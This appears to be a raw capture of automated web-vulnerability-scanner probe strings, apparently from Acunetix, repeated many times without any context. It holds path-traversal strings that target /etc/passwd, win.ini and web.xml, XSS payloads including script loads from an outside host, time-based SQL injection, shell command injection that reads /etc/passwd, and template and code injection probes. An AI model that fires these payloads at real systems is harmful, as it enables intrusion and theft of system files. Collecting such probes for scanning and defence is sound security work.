../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu7843\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7843

1

acux5940\xc0\xbez1\xc0\xbcz2a\x90bcxuca5940

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<ScRiPt >prompt(957783)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(952617)</script>

1

1

1<ScRiPt >prompt(940046)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906624></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(946640)</ScRiPt>

1

response.write(9313118*9003266)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(976476)">

1

'+response.write(9313118*9003266)+'

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919442)"></g></svg>

1

"+response.write(9313118*9003266)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(998317))>

1

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1<body onload=prompt(914317)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955553)>

1

${99619+100284}

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(968063)>

1

1&n986038=v907833

1

-1)

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1<img/src=">" onerror=alert(939839)>

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(946650)</sCripT>

1

'"()

8OZWAcv8'

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1&lt

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

5bg4pjNi')

\xf6<img acu onmouseover=prompt(954927) //\xf6>

'

'

/etc/passwd

1

1

1

1

1

viC6QOTQ'))

1<input autofocus onfocus=prompt(941818)>

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

1

1

-1)

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

http://hitfO0OnMu0Sb.bxss.me/

1

1

comments

1_bjo2W <ScRiPt >prompt(994063)</ScRiPt>

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

1

1

1

comments

1

baCCLNe9'

1

"&dir&"

1

1

1

gBX54tDV')

comments/.

http://www.acunetix.tst

'"

1'"()&%<ScRiPt >prompt(902106)</ScRiPt>

|dir

1

1

8snGhSJ5'))

1

1

<!--

file:///etc/passwd

'"()&%<ScRiPt >prompt(925387)</ScRiPt>

1

1

1

1

'|dir

1

1

1_926793

"|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

acu10212\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10212

1

1

acux2274\xc0\xbez1\xc0\xbcz2a\x90bcxuca2274

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(957632)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(973989)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(979354)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929948></ScRiPt>

1

1

................windowswin.ini

1<ScRiPt >prompt(935722)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(964280)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(975871)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<div style=width:expression(prompt(970626))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

1<body onload=prompt(953828)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949658)>

1

1

1

1<img src=xyz OnErRor=prompt(940301)>

WEB-INF/web.xml

1<img/src=">" onerror=alert(922414)>

1

WEB-INF\web.xml

1

1<ScRiPt%20>prompt(992064)</sCripT>

1&lt

1

1

\xf6<img acu onmouseover=prompt(968004) //\xf6>

1

1

1<input autofocus onfocus=prompt(949918)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_NsUXC <ScRiPt >prompt(914744)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9456712*9645750)

1

1

&cat /etc/passwd&

'+response.write(9456712*9645750)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9456712*9645750)+"

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

1

1

${100196+99154}

1

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n925408=v970640

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

-1)

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

1

-1))

!(()&&!|*|*|

'"()

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

WWSE9B9i'

1

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

DTuXUkjB')

1

1

'

1

"

1

YMu3Bl6W'))

/etc/passwd

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

http://hit1R5CA9TF5B.bxss.me/

acunetix_wvs_invalid_filename

&dir

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

eA4llJVx'

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

ANTfJ4W8')

comments

'"

1

1'"()&%<ScRiPt >prompt(995543)</ScRiPt>

1

"&dir&"

'"()&%<ScRiPt >prompt(907341)</ScRiPt>

1

comments/.

Szj8ZWbH'))

<!--

1_936605

|dir

1

1

1

file:///etc/passwd

1

'|dir

1

1

"|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

1

acu2561\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2561

WEB-INF\web.xml

1

acux4662\xc0\xbez1\xc0\xbcz2a\x90bcxuca4662

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(904843)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1<script>prompt(975024)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(924147)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964096></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(932118)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(935893)">

response.write(9170910*9055429)

1

1

&cat /etc/passwd&

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'+response.write(9170910*9055429)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924949)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9170910*9055429)+"

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(920931))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1

1<body onload=prompt(949821)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954503)>

`cat /etc/passwd`

${100240+100170}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1&n977414=v987195

1

1<img src=xyz OnErRor=prompt(983241)>

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1<img/src=">" onerror=alert(991229)>

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

-1))

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(956669)</sCripT>

testasp.vulnweb.com

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

oOkawHnu'

'"()

1

^(#$!@#$)(()))******

1

1

/etc/passwd

1&lt

JX2wn062')

'

1

1

1

1

1

1

pVAkqCSX'))

\xf6<img acu onmouseover=prompt(958592) //\xf6>

'

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1

-1

1<input autofocus onfocus=prompt(902997)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

acunetix_wvs_invalid_filename

1

-1)

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

http://hitnFlzJ1VmmT.bxss.me/

1

comments

-1))

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

&dir

1

bi60tIH3'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1_8SHsb <ScRiPt >prompt(970446)</ScRiPt>

comments/.

'&dir&'

file:///etc/passwd

'"

pivXM3vZ')

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

<!--

1

1

Hc83bJll'))

1

1

|dir

1

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(921594)</ScRiPt>

1

1

1

WEB-INF\web.xml

'|dir

1

1

'"()&%<ScRiPt >prompt(993930)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1_988224

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

acu8285\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8285

..\..\..\..\..\..\..\..\windows\win.ini

1

acux1822\xc0\xbez1\xc0\xbcz2a\x90bcxuca1822

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(936362)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<script>prompt(983329)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(955626)</ScRiPt>

response.write(9286850*9202970)

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936034></ScRiPt>

'+response.write(9286850*9202970)+'

WEB-INF/web.xml

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(931886)</ScRiPt>

1

"+response.write(9286850*9202970)+"

1

'&cat /etc/passwd&'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(996623)">

1

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974218)"></g></svg>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1<div style=width:expression(prompt(980272))>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

${99104+99683}

1

1<iframe src='data:text/html

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

|cat /etc/passwd#

1<body onload=prompt(924852)>

-1)

1&n966584=v944789

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928722)>

)

1

'|'ld

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1<img src=xyz OnErRor=prompt(963399)>

'"()

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

!(()&&!|*|*|

UMgl0RxW'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<img/src=">" onerror=alert(979684)>

1

QVSdrQ2c')

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1

testasp.vulnweb.com

1

1<ScRiPt%20>prompt(945192)</sCripT>

no2sxN6v'))

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

"

1

1

-1

"

1&lt

1

1

1

1

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1

\xf6<img acu onmouseover=prompt(971469) //\xf6>

1

1

comments

||cat /etc/passwd

http://hitP4N5PbPEzR.bxss.me/

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(992466)>

comments

1

1

1

1

&dir

ANpcC3Uz'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

<a href='http://www.acunetix.com'>website security</a>

1

http://www.acunetix.tst

TRsQ3CQN')

'"

'&dir&'

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

LOREHMby'))

<!--

1'"()&%<ScRiPt >prompt(987130)</ScRiPt>

1

1_LbZJd <ScRiPt >prompt(944160)</ScRiPt>

1

"&dir&"

1

1

'"()&%<ScRiPt >prompt(924972)</ScRiPt>

1

1

1

|dir

file:///etc/passwd

1

1

1_984022

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

"|dir

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu4547\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4547

1

1

1

acux4456\xc0\xbez1\xc0\xbcz2a\x90bcxuca4456

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(918140)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(919433)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(984278)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995998></ScRiPt>

1

1

1

response.write(9297971*9680777)

1<ScRiPt >prompt(957351)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1

1<video><source onerror="javascript:prompt(999713)">

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9297971*9680777)+'

1

../../../../../../../../../../etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958690)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9297971*9680777)+"

1<div style=width:expression(prompt(938519))>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

cat /etc/passwd

1<iframe src='data:text/html

1

${99120+100449}

1

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF/web.xml

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(964066)>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

1

1

1

1some_inexistent_file_with_long_name%00.jpg

-1

1&n917058=v934866

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918001)>

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

1<img src=xyz OnErRor=prompt(922450)>

'|'ld

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

testasp.vulnweb.com

1

-1))

"|"ld

1<img/src=">" onerror=alert(919624)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

1

IjyXsIK3'

'

1<ScRiPt%20>prompt(910278)</sCripT>

1

1

1

1

/etc/passwd

1

5V9wXEeg')

"

'

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

c1gBQtRL'))

1

${@print(md5(acunetix_wvs_security_test))}

\xf6<img acu onmouseover=prompt(907182) //\xf6>

1

1

1

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1<input autofocus onfocus=prompt(979090)>

http://hitGNqa40Pept.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

1

-1)

<a href='http://www.acunetix.com'>website security</a>

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

-1))

'&dir&'

http://www.acunetix.tst

[url=http://www.acunetix.com]website security[/url]

1

'"

comments/.

vIUjZMYD'

1_1v5g1 <ScRiPt >prompt(949915)</ScRiPt>

1'"()&%<ScRiPt >prompt(978435)</ScRiPt>

"&dir&"

<!--

1

1

file:///etc/passwd

1

1

YIAaFhhh')

1

'"()&%<ScRiPt >prompt(905190)</ScRiPt>

1

|dir

1

1

3sJcxxtM'))

1

1

/\../\../\../\../\../\../\../etc/passwd

1_994873

1

1

1

1

'|dir

1

1

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

acu4445\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4445

1

1

../../../../../../../../../../windows/win.ini

acux6203\xc0\xbez1\xc0\xbcz2a\x90bcxuca6203

1

1

1

1<ScRiPt >prompt(983733)</ScRiPt>

../../../../../../../../../../boot.ini

1<script>prompt(943771)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(915475)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?999946></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(996750)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(963262)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960033)"></g></svg>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(915905))>

1

response.write(9672113*9984720)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

'+response.write(9672113*9984720)+'

1

&cat /etc/passwd&

1

1<body onload=prompt(927293)>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9672113*9984720)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938770)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

1

1<img src=xyz OnErRor=prompt(914755)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

1<img/src=">" onerror=alert(959322)>

1

1

1

"&cat /etc/passwd&"

WEB-INF\web.xml

1<ScRiPt%20>prompt(917849)</sCripT>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1&lt

1

../../../../../../../../../../etc/passwd.jpg

${99921+99727}

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

\xf6<img acu onmouseover=prompt(948680) //\xf6>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n931740=v969998

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(913082)>

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

obw6QGmm'

'|'ld

testasp.vulnweb.com

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

[url=http://www.acunetix.com]website security[/url]

^(#$!@#$)(()))******

'

5fGVePt1')

1

1

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1_MZMF1 <ScRiPt >prompt(915340)</ScRiPt>

"

xu27kT9z'))

1

1

1

1

1

1

1

/etc/passwd

-1

${@print(md5(acunetix_wvs_security_test))}

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

"

1

acunetix_wvs_invalid_filename

http://hitN6yjEfxgj0.bxss.me/

1

1

-1))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://www.acunetix.tst

||cat /etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

hkFyytN8'

comments

'"

&dir

1

1'"()&%<ScRiPt >prompt(987483)</ScRiPt>

1

1

1

'&dir&'

<!--

0fgD989Z')

comments/.

1

